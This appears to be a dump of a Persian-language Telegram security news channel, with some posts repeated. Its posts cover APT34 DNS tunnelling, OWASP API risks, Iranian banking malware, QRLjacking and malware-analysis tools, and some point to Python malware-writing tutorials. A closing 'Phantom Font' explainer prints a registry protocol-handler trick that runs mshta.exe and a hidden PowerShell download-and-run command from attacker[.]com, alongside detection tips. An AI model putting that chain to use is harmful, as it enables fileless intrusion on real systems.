#Saitama #Malware #APT34
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.
زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.
اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.
oxn009lc7n5887k96c4zfckes6uif.rootdomain.com
زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر
70.119.104.111 - 97.109.105.49
اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.
زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.
اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.
oxn009lc7n5887k96c4zfckes6uif.rootdomain.com
زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر
70.119.104.111 - 97.109.105.49
اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.
info
Study materials for the Certified Red Team Pentesting (CRTP) exam
https://github.com/0xStarlight/CRTP-Notes
@Engineer_Computer
#businessadvisor #cyberdefense #data #cybersecurityawareness #cybersecuritytraining #cybercrime #cyberdefense #networksecurity
#securityaudit #intelligenceéconomique #analytics #research #mal #malware #reverseengineering #engineering #team #business #software #security
#BusinessSecureContinuity
Study materials for the Certified Red Team Pentesting (CRTP) exam
https://github.com/0xStarlight/CRTP-Notes
@Engineer_Computer
#businessadvisor #cyberdefense #data #cybersecurityawareness #cybersecuritytraining #cybercrime #cyberdefense #networksecurity
#securityaudit #intelligenceéconomique #analytics #research #mal #malware #reverseengineering #engineering #team #business #software #security
#BusinessSecureContinuity
#DiyakoSecureBow
Analytics
OWASP Top 10 API Security Risks - 2023
Risk:
1.
API1:2023 - Broken Object Level Authorization
Description:
APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user.
2.
API2:2023 - Broken Authentication
Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising a system's ability to identify the client/user, compromises API security overall.
3.
API3:2023 - Broken Object Property Level Authorization
This category combines API3:2019 Excessive Data Exposure and API6:2019 - Mass Assignment, focusing on the root cause: the lack of or improper authorization validation at the object property level. This leads to information exposure or manipulation by unauthorized parties.
4.
API4:2023 - Unrestricted Resource Consumption
Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Other resources such as emails/SMS/phone calls or biometrics validation are made available by service providers via API integrations, and paid for per request. Successful attacks can lead to Denial of Service or an increase of operational costs.
5.
API5:2023 - Broken Function Level Authorization Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers can gain access to other users’ resources and/or administrative functions.
https://owasp.org/API-Security/editions/2023/en/0x11-t10
@Engineer_Computer
#businessadvisor #cyberdefense #data #gpt4 #ai #cybersecurityawareness #cybersecuritytraining #cybercrime #cyberdefense #networksecurity
#securityaudit #intelligenceéconomique #analytics #research #mal #malware #reverseengineering #engineering #team #business #software #security
Analytics
OWASP Top 10 API Security Risks - 2023
Risk:
1.
API1:2023 - Broken Object Level Authorization
Description:
APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user.
2.
API2:2023 - Broken Authentication
Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising a system's ability to identify the client/user, compromises API security overall.
3.
API3:2023 - Broken Object Property Level Authorization
This category combines API3:2019 Excessive Data Exposure and API6:2019 - Mass Assignment, focusing on the root cause: the lack of or improper authorization validation at the object property level. This leads to information exposure or manipulation by unauthorized parties.
4.
API4:2023 - Unrestricted Resource Consumption
Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Other resources such as emails/SMS/phone calls or biometrics validation are made available by service providers via API integrations, and paid for per request. Successful attacks can lead to Denial of Service or an increase of operational costs.
5.
API5:2023 - Broken Function Level Authorization Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers can gain access to other users’ resources and/or administrative functions.
https://owasp.org/API-Security/editions/2023/en/0x11-t10
@Engineer_Computer
#businessadvisor #cyberdefense #data #gpt4 #ai #cybersecurityawareness #cybersecuritytraining #cybercrime #cyberdefense #networksecurity
#securityaudit #intelligenceéconomique #analytics #research #mal #malware #reverseengineering #engineering #team #business #software #security
owasp.org
OWASP Top 10 API Security Risks – 2023 - OWASP API Security Top 10
The Ten Most Critical API Security Risks
⭕️شرکت امنیتی سوفِس در گزارشی از کمپین یک #بدافزار اندرویدی علیه مشتریان چهار بانک ایرانی خبر داد. این چهار بانک عبارتند از بانکهای ملت، صادرات، رسالت و بانک مرکزی.
این بدافزار امکان سرقت نام کاربری و پسورد حسابهای بانکی و خواندن پیامک کاربران را دارد. نکته مهم دیگه درباره این بدافرار استفاده از یک گواهی دیجیتالی احتمالا بسرقت رفته از یک شرکت در مالزی است که برای قراردادن بدافرار در گوگل پلی استفاده شده است.
همچنین از اونجاییکه نام تعدادی اَپ کریپتو در سورس کد بدافزار قرار داره، احتمالا سازنده های این بدافزار اهداف بزرگتری در سر داشته اند.
https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
https://github.com/sophoslabs/IoCs/blob/master/Iranian-banking-malware.csv
#malware #mobile #android
@Engineer_Computer
این بدافزار امکان سرقت نام کاربری و پسورد حسابهای بانکی و خواندن پیامک کاربران را دارد. نکته مهم دیگه درباره این بدافرار استفاده از یک گواهی دیجیتالی احتمالا بسرقت رفته از یک شرکت در مالزی است که برای قراردادن بدافرار در گوگل پلی استفاده شده است.
همچنین از اونجاییکه نام تعدادی اَپ کریپتو در سورس کد بدافزار قرار داره، احتمالا سازنده های این بدافزار اهداف بزرگتری در سر داشته اند.
https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
https://github.com/sophoslabs/IoCs/blob/master/Iranian-banking-malware.csv
#malware #mobile #android
@Engineer_Computer
🔥4👍2🤯1
لیست API هایی که Malware ها استفاده می کنند.
لیست کامل از سایت زیر قابل مشاهده است:
https://malapi.io/#
#security
#API
#malware
@Engineer_Computer
لیست کامل از سایت زیر قابل مشاهده است:
https://malapi.io/#
#security
#API
#malware
@Engineer_Computer
#malware #python #pythonic_malware
چه طور میشه از پایتون برای توسعه یه بدافزار استفاده کرد!؟
پیشنهاد می کنم این مقاله بخونید تا از اخرین تکنیک های توسعه بدافزار با پایتون اشنا بشید
https://www.cyborgsecurity.com/cyborg-labs/python-malware-on-the-rise/
@Engineer_Computer
چه طور میشه از پایتون برای توسعه یه بدافزار استفاده کرد!؟
پیشنهاد می کنم این مقاله بخونید تا از اخرین تکنیک های توسعه بدافزار با پایتون اشنا بشید
https://www.cyborgsecurity.com/cyborg-labs/python-malware-on-the-rise/
@Engineer_Computer
Intel 471
Blog: Stay Ahead of Cyber Threats
Get the intelligence you need to detect, prevent & respond to cyber threats. Read the Intel 471 cyber threat intelligence blog.
⭕️ ادوارد اسنودن در توییتی کنایه آمیز به نتانیاهو تلاش وی برای توسعه تجارت پرسود فروش جاسوس افزارهای اسراییلی به حکومتهای تمامیت خواه جهت هک گوشیهای فعالان حقوق بشر رو یادآور شد و در پایان به این حقیقت اشاره کرد که گویا این ابزارهای جاسوسی کارایی چندانی جهت جاسوسی از حماس ندارند.
#snowden #israel #war #malware
@Engineer_Computer
#snowden #israel #war #malware
@Engineer_Computer
خیلی ساده می تونید یاد بگیرید با پایتون بدافزار بسازید!!!!
#malware #pythonic_malware
https://www.youtube.com/watch?v=UtMMjXOlRQc
@Engineer_Computer
#malware #pythonic_malware
https://www.youtube.com/watch?v=UtMMjXOlRQc
@Engineer_Computer
YouTube
i created malware with Python (it's SCARY easy!!)
Create your Python Malware lab: https://ntck.co/linode (you get a $100 Credit good for 60 days as a new user!)
We are going to write our very own malware in Python!! It’s actually scary easy to do and it will give you a peek behind the curtain of how bad…
We are going to write our very own malware in Python!! It’s actually scary easy to do and it will give you a peek behind the curtain of how bad…
🔴 گروه ایرانی Scarred Manticore، خاورمیانه را با بدافزار LIONTAIL هدف قرار میدهد
گروه Scarred Manticore سازمانهای مطرحی را هدف قرار میدهد که مشخصا بر ارتباطات راه دور، نظامی و نهادهای دولتی جدای از موسسات مالی، ارائهدهندگان خدمات فناوری اطلاعات و سازمانهای غیردولتی تمرکز دارند.
مجموعه Check Point Research و تیم پاسخگویی به حوادث Sygnia در ادعاهای خود، یک کمپین جاسوسی جدید ایرانی را که با گروه تهدید Scarred Manticore مرتبط است، کشف کردهاند.
در گزارش چکپوینت ریسرچ با عنوان «از آلبانی تا خاورمیانه: مانتیکور زخمی در حال گوش دادن است»، آمده است که این گروه از یک فریمورک بدافزاری که قبلا شناسایی نشده به نام LIONTAIL استفاده میکند. این بدافزار از بارگذارهای سفارشی و payloadهای shellcode مستقر در حافظه استفاده میکند تا عملکردهای مخرب خود را در ترافیک شبکه قانونی ادغام کند.
#Cybersecurity #Cyber_Attack #Scarred_Manticore #LIONTAIL #Malware #Backdoor #Iran #Israel #Digital_Chameleon #OilRig #Framework #امنیت_سایبری #حمله_سایبری #بدافزار
مطالعه کامل خبر 👉
@Engineer_Computer
گروه Scarred Manticore سازمانهای مطرحی را هدف قرار میدهد که مشخصا بر ارتباطات راه دور، نظامی و نهادهای دولتی جدای از موسسات مالی، ارائهدهندگان خدمات فناوری اطلاعات و سازمانهای غیردولتی تمرکز دارند.
مجموعه Check Point Research و تیم پاسخگویی به حوادث Sygnia در ادعاهای خود، یک کمپین جاسوسی جدید ایرانی را که با گروه تهدید Scarred Manticore مرتبط است، کشف کردهاند.
در گزارش چکپوینت ریسرچ با عنوان «از آلبانی تا خاورمیانه: مانتیکور زخمی در حال گوش دادن است»، آمده است که این گروه از یک فریمورک بدافزاری که قبلا شناسایی نشده به نام LIONTAIL استفاده میکند. این بدافزار از بارگذارهای سفارشی و payloadهای shellcode مستقر در حافظه استفاده میکند تا عملکردهای مخرب خود را در ترافیک شبکه قانونی ادغام کند.
#Cybersecurity #Cyber_Attack #Scarred_Manticore #LIONTAIL #Malware #Backdoor #Iran #Israel #Digital_Chameleon #OilRig #Framework #امنیت_سایبری #حمله_سایبری #بدافزار
مطالعه کامل خبر 👉
@Engineer_Computer
👍1👎1🔥1
⭕️ به حمله ای جالب از سری حملات بر روی QRCode ها تحت عنوان QRLjacking برخورد داشتم که به روش کار آن میپردازیم.
این سری از حملات معمولا ترکیبی از مهندسی اجتماعی،فیشینگ و بعضا همراه با بدافزار خواهد بود.
به طوری که فکر کنید محل و مکان معتبری که در آن اطلاعات شخصی و مشخصات خود را ذخیره دارید و اگر براکت های QRCode دار آن محل را مهاجم دستکاری کرده و یا لینک آن را در فضای مجازی به شما ارسال کند و به لینک مقصد خود و با همان ساختار سامانه مشابه هدایت کند،
از این تکنیک حملات استفاده میکند.
البته باید گفت گاها اتفاق می افتد که برنامه های QRCode خوان خود نیز آلوده بوده و منجر به فیشینگ و یا ربایش اطلاعات خواهد شد.
https://www.hackread.com/hackers-exploit-qr-codes-qrljacking-malware/
#Phishing #Malware #RedTeam
@Engineer_Computer
این سری از حملات معمولا ترکیبی از مهندسی اجتماعی،فیشینگ و بعضا همراه با بدافزار خواهد بود.
به طوری که فکر کنید محل و مکان معتبری که در آن اطلاعات شخصی و مشخصات خود را ذخیره دارید و اگر براکت های QRCode دار آن محل را مهاجم دستکاری کرده و یا لینک آن را در فضای مجازی به شما ارسال کند و به لینک مقصد خود و با همان ساختار سامانه مشابه هدایت کند،
از این تکنیک حملات استفاده میکند.
البته باید گفت گاها اتفاق می افتد که برنامه های QRCode خوان خود نیز آلوده بوده و منجر به فیشینگ و یا ربایش اطلاعات خواهد شد.
https://www.hackread.com/hackers-exploit-qr-codes-qrljacking-malware/
#Phishing #Malware #RedTeam
@Engineer_Computer
Hackread
Hackers Exploit QR Codes with QRLJacking for Malware Distribution
Follow us on Twitter @Hackread - Facebook @ /Hackread.
👍2
👹Malware Analysis Tools👾
Mindmap of links:
Encoding/Decoding tools
File Carving tools
Memory Forensics
Online scanners
Malware analysis tools
Debuggers/Decompliers
🔗https://malwareanalysis.tools/
#malware
@Engineer_Computer
Mindmap of links:
Encoding/Decoding tools
File Carving tools
Memory Forensics
Online scanners
Malware analysis tools
Debuggers/Decompliers
🔗https://malwareanalysis.tools/
#malware
@Engineer_Computer
malwareanalysis.tools
Malware Analysis Tools
Malware analysis tools list
❤2
⭕️ 3 روش برای بارگذاری داینامیک کد در اندروید
بارگذاری کد داینامیک در اندروید از روشهایی است که بدافزار ها برای پنهان کردن رفتار مخرب خود از دید آنتی ویروس ها استفاده میکنند.
در این مقاله محقق امنیتی 3 روش مختلف برای لود داینامیک کد ها مثال زده است
1️⃣DexClassLoader
2️⃣PathClassLoader
3️⃣InMemoryDexClassLoader
🔗 Blog Post |
Github
#Android #Malware
@Engineer_Computer
بارگذاری کد داینامیک در اندروید از روشهایی است که بدافزار ها برای پنهان کردن رفتار مخرب خود از دید آنتی ویروس ها استفاده میکنند.
در این مقاله محقق امنیتی 3 روش مختلف برای لود داینامیک کد ها مثال زده است
1️⃣DexClassLoader
2️⃣PathClassLoader
3️⃣InMemoryDexClassLoader
🔗 Blog Post |
Github
#Android #Malware
@Engineer_Computer
Erev0S
3 ways for Dynamic Code Loading in Android
erev0s blog for cyber security and more
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Android Malware with Fake Extension(PDF) in Whatsapp
در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.
#Android #Malware
@Engineer_Computer
در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.
#Android #Malware
@Engineer_Computer
😱2
یکی از پیامدهای آلوده شدن سیستم به بدافزار (hashtag#Malware)، امکان ایجاد تغییراتی در فایلها و فولدرهای سیستم توسط کدهای مخرب است. برای تحلیل زنده (Live Analysis) سیستمهای آلوده، یک روش مؤثر صحتسنجی فایلها و فولدرها به کمک ابزارهایی مانند:
این ابزارها تغییرات ایجادشده را شناسایی میکنند و تحلیل دقیقی ارائه میدهند.
اگر دسترسی به ابزارهای تخصصی فوق وجود ندارد، ابزار داخلی Windows به نام Sigverif میتواند برای بررسی تغییرات در فایلهای سیستمی مورد استفاده قرار گیرد.
#CyberSecurity #MalwareAnalysis #FileIntegrity #ThreatDetection #WindowsTools #SystemSecurity #Sigverif #Tripwire #NetwrixAuditor #ITSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد میشود!
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
چرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
🔸 هر اجرای ناگهانی mshta بدون فایل
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
C:\\Windows\\System32\\mshta.exeچرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
.reg را دانلود میکند.2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
fontview:// تعریف میکند.و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
fontview://load ریدایرکت میشود.پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید🔸 هر اجرای ناگهانی mshta بدون فایل
.hta را بررسی کنید🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏2🔥1🎉1🤩1